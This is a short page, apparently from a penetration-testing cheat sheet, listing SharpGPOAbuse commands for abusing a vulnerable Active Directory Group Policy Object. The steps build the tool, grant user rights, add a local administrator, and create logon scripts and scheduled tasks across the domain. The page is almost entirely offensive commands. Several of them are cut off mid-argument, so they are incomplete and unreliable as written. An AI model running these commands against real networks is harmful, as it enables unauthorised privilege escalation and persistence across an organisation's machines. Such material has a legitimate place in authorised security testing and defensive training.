search
githubEdit

SharpGPOAbuse https://github.com/FSecureLABS/SharpGPOAbuse

hashtag
1) Build and configure SharpGPOAbuse

Install-Package CommandLineParser -Version 1.9.3.15

$ ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.

hashtag
2) Adding User Rights

.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight"

hashtag
3) Adding a Local Admin

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"

hashtag
4) Configuring a User or Computer Logon script

.\SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents

hashtag
5) Configuring a Computer or User Immediate Task

hashtag
/!\ Intended to "run once" per GPO refresh, not run once per system

.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command

.\SharpGPOAbuse.exe --AddComputerTask --GPOName "VULNERABLE_GPO" --Author 'LAB.LOCAL\
PreviouspyGPOAbuse https://github.com/Hackndo/pyGPOAbuseNextStandIn https://github.com/FuzzySecurity/StandIn

Last updated